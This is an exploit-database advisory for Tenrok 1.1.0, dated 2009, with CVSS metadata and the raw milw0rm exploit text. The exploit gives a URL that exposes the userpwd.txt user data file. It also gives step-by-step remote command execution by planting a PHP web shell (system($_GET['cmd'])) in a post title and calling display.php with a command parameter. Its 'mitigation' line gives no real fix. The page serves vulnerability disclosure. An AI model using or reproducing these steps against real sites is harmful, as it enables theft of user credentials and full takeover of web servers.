Tenrok 1.1.0 (UDD/RCE) Multiple Remote Vulnerabilities

vendor:

Tenrok

by:

SirGod

8,8

CVSS

HIGH

Users Data Disclosure and Remote Command Execution

200, 78

CWE

Product Name: Tenrok

Affected Version From: 1.1.0

Affected Version To: 1.1.0

Patch Exists: NO

Related CWE: N/A

CPE: tenrok

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Tenrok 1.1.0 (UDD/RCE) Multiple Remote Vulnerabilities

Tenrok 1.1.0 is vulnerable to users data disclosure and remote command execution. An attacker can access the userpwd.txt file to view the users data and can execute remote commands by writing a malicious code in the Title field of post.php and then accessing the display.php page with the command as a parameter.

Mitigation:

Ensure that the application is not vulnerable to users data disclosure and remote command execution.

Source

Exploit-DB raw data:

#########################################################################
[+] Tenrok 1.1.0 (UDD/RCE) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#########################################################################

[+] Homepage : http://tenrok.com/

[+] Users Data Disclosure

 - PoC

    http://127.0.0.1/userpwd.txt

[+] Remote Command Execution

 - Must be logged in.

 - Go to

       http://127.0.0.1/post.php

   in the Title field write :

      <?php system($_GET['cmd']); ?>

   then go to

     http://127.0.0.1/display.php?cmd=[YOUR COMMAND]

   and execute your commands.

 - PoC

     http://127.0.0.1/display.php?cmd=whoami

#########################################################################

# milw0rm.com [2009-08-05]